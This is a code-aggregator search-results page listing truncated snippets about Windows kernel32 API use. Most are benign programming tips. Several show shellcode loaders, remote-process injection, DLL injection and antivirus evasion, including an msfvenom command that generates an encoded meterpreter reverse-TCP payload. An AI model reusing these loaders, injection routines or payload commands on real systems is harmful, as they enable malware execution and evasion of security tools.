ICode9

精准搜索请尝试: 精确搜索
  • C# 判断文件是否被占用2022-06-13 16:33:41

    using System.IO; using System.Runtime.InteropServices; namespace DarkBlue.FileOccupied { public sta class FileHlper { [DllImport("kernel32.dll")] public static extern IntPtr _lopen(string lpPathName, int iReadWrite);

  • 我的shellcode loader观-12022-06-11 13:34:41

    包含内容: 1.传统的shellcode loader 2.Python中的加密loader 3.Python相对于shelcode load 的优势 4.cython帮助我们将.py转.c 5.Python中源码混淆工具分享 1 . shellcode loader 这是一个源码: import ctypes shellcode = bytearray(b'') ctypes.windll.kerne

  • X86汇编 使用DwToXX类型API的注意问题2022-03-31 20:31:41

    今日同学问到一个问题,关于下面的汇编程序为什么没有输出? .386 .model flat,stdcall option casemap:none include Stdlib.Inc includelib Stdlib.lib include kernel32.inc includelib kernel32.lib .dataa db 64 dup(0)b db 64 dup(0)len db 0

  • kernel32!OpenFile与ntdll!NtOpenFile2022-02-03 19:35:11

    kernel32!OpenFile与ntdll!NtOpenFile kernel32!OpenFile并不是直接调用的ntdll!NtOpenFile,其调用的是ntdll!NtCreateFile。 ntdll!NtOpenFile ntdll!NtOpenFile函数并没有导出,如果要调用的话需要GetProcAddress动态获取。 typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Sta

  • 在Windows 10的cmd输出彩色文本2021-12-10 07:31:06

    # termcolor outputs stuff like '\033[0m'. It doesn't work in Windows 10's cmd. import sys from ctypes import * user32 = CDLL('user32.dll'); kernel32 = CDLL('kernel32.dll') # https://docs.microsoft.com/en-us/windo

  • CobaltStrike使用-第九篇-免杀2021-12-08 21:34:46

    本篇将会介绍CS payload免杀工具的使用 文章目录 杀毒软件杀软常见扫描方式杀软扫描引擎常见免杀技术 免杀工具使用HanzoInjectionInvoke-PSImagePython脚本封装Artifact KitVeil Evasion免杀插件 常规杀毒软件的目的就是发现已知病毒并中止删除它,而作为攻击者则需要

  • 不要迷恋我,我只是利用Python修改了游戏内存2021-11-18 10:00:22

    前言   大家好,我叫善念。上篇文章我许了一个愿,就是想让大家多多关注我,然后我的粉丝就蹭蹭地涨了好几百,谢谢大家的厚爱。可是我发现粉丝是涨了,三连变少了,谢谢大家这次给我三连,我一定再接再厉。有问题留在评论区,我会一一回复,谢谢大家! 很多人学习python,不知道从何学起。 很多人学

  • 加载shellcode到32位Windows程序远程进程中2021-11-16 23:05:07

    BOOL WINAPI LoadDll(HANDLE hProcess,LPVOID lpBuf,int cbBuf) { BOOL br = FALSE; LPVOID m_lpData = VirtualAllocEx(hProcess, NULL,cbBuf,MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (m_lpData==NULL) { goto cleanup0; } if(!WriteProcessMemory(hProces

  • python shellcode加载器2021-09-26 08:36:19

    默认是x64位的msf from ctypes import * from ctypes import wintypes import ctypes buf = b"" buf += b"\x56\xff\xd5" ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf)) LPBYTE = POINTER(c_byte) ctype

  • 使用Visual C++高版本的XP支持生成带boost执行文件在XP上报kernel32缺函数2021-08-26 03:31:06

    典型症状 使用Visual Studio 2019,安装“对VS 2017 (v141)工具的C++ Windows XP支持”后,用该v141_xp平台工具集生成的执行文件在Windows XP SP3下仍无法运行,Release版本报错,Debug版本提示“在KERNEL32.DLL中找不到xxxxxx”,典型的找不到的有InitializeSRWLock或InitializeCriticalSe

  • 20182228 实验四《Python程序设计》实验报告2021-06-30 21:01:29

    课程:《Python程序设计》班级: 201822姓名: 李卓伦学号:20182228实验教师:王志强实验日期:2020年6月30日必修/选修: 公选课   1.实验内容 python综合实践——游戏(破解)   2. 实验过程及结果 (1) 利用import win32gui,获取找到这个窗口的进程,利用win32process.GetWindowThreadProcessId获

  • C#简繁体转换方法(kernel32.dll)2021-06-16 18:58:00

    C#简繁体转换方法(kernel32.dll) 2.import kernel32.dll 复制  保存 [DllImport("kernel32.dll", EntryPoint = "LCMapStringA")] public static extern int LCMapString( int Locale, int dwMapFlags, byte[] lpSrcStr, int cchSrc, byte[] lpDestStr, int c

  • 创建ini文件,读文件和写文件2021-05-12 17:04:06

    [DllImport("kernel32")] private static extern long WritePrivateProfileString(string section, string key, string val, string filePath); [DllImport("kernel32")] private static extern int GetPrivateProfileString(string section, string key

  • 无法定位程序输入点 AddDllDirectory 于动态链接库 KERNEL32.dll2021-02-19 20:02:40

    今天,在电脑刚安装完Windows 7系统后准备打驱动,结果所有驱动都无法安装,报错“无法定位程序输入点 AddDllDirectory 于动态链接库 KERNEL32.dll”   解决方法: 去微软官网下载 windows6.1-kb2533623-x64.msu 补丁程序,安装完成后重启计算机即可,微软官网下载链接已挂,这里提供下载链接

  • C# 利用动态库DllImport("kernel32")读写ini文件2021-01-21 15:34:35

    1 ini文件读写            kernel32.dll是Windows中非常重要的32位动态链接库文件,属于内核级文件。它控制着系统的内存管理、数据的输入输出操作和中断处理,当Windows启动时,kernel32.dll就驻留在内存中特定的写保护区域,使别的程序无法占用这个内存区域。         为什么

  • 一个有趣的东西,检查64位系统中的进程是32位还是64位2020-12-24 15:01:20

    int GetResourceId(void) { typedef BOOL (*P_IsWow64Process)(HANDLE, BOOL *); HMODULE kernel32 = LoadLibrary(L"kernel32.dll"); P_IsWow64Process __sys_IsWow64Process = (P_IsWow64Process)GetProcAddress(kernel32, "IsWow64Pr

  • shellcode加载器编写2020-11-25 10:03:10

    Python3 shellcode通用加载器 #!/usr/bin/python3 import ctypes #shellcode 放这个位置 c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" shellcode = bytearray(c) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

  • Python——dll注入2020-08-02 21:31:33

    import sys from ctypes import * FAGE_READWRITE = 0x04 PROCESS_ALL_ACCESS = 0x001F0FFF VIRTUAL_MEN = (0x1000 | 0x2000) kernel32 = windll.kernel32 user32 = windll.user32 pid = sys.argv[1] dll_path = sys.argv[2] dll_len = len(dll_path) h_process = kernel

  • msvsmon远程调试启动时挂起真正有效办法2020-03-12 16:39:22

    正确方法 while (!Debugger.IsAttached) { Thread.Sleep(1000); } //下面开始你的代码 以下2中检测调试都无效 [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] private static extern bool IsDebuggerPresent(); [DllImport(

  • gcc -O2 优化,到底做了什么? 程序都不能正常运行了。2020-03-06 09:51:35

    一个项目开发到维护有五年时间了。 今天在项目中加入了一段代码后,软件启动后,窗口显示不出来了。 加入的代码: HMODULE hDll_kernel32 = LoadLibrary("kernel32.dll"); // 加载 kernel32.dll if(hDll_kernel32) { FARPROC proc = GetProcAddress(hDll_kernel32, "

  • 提示错误:“已加载“C:\Windows\SysWOW64\kernel32.dll”。“包括”/“排除”设置禁用了加载功能”2020-01-26 17:07:51

    解决方案:工具 ->选项 -> 调试 ->符号  中箭头部分勾选上就可以了。 参考:https://blog.csdn.net/weixin_41605888/article/details/89226311 点赞 收藏 分享 文章举报 Rebirth_2017 发布了34 篇原创文章 · 获赞 12 · 访问量 4万+ 私信

  • payload分离免杀2020-01-08 17:04:22

    shellcode loader 借助第三方加载器,将shellcode加载到内存中来执行。 https://github.com/clinicallyinane/shellcode_launcher msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c 靶机执行 shellcode

  • 微信 电脑版 HOOK(WeChat PC Hook)- 远程线程注入dll原理2019-12-22 17:02:30

    Windows加载dll的特性   1、Windows系统中,每个exe软件运行的时候,会加载系统模块kernel32.dll   2、所有加载进exe软件的系统模块kernel32.dll,内存地址都是一样   3、kernel32.dll中的LoadLibrary()函数用于加别载的dll   4、dll内的函数相对dll模块的地址不变(偏移不变) 注

  • 使用CBrother的CLIB库调用windows的API2019-11-18 15:52:49

    使用CBrother的CLIB库调用windows的API 2.1.0版本CBrother加入了CLib库,最新需要写一个工具,根据路径查杀一个Windows进程,研究了一下,CLib库的用法,感觉还是比较灵活的。 首先我要明确每一个API在系统的哪一个dll里面,我一般都是去微软官网查这个API。(https://docs.microsoft.com/zh-cn

  • 向JNA类Java(Kernel32)添加另一个方法2019-10-13 13:13:53

    我试图使用WIN32 dll中的方法,但JNA中未包含该方法. 方法是GetProductInfo 我在单独的项目中尝试此工作: public interface Kernel32 extends Library { public boolean GetProductInfo(int dwOSMajorVersion,int dwOSMinorVersion, int dwSpMajorVersion, int dwSpM

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有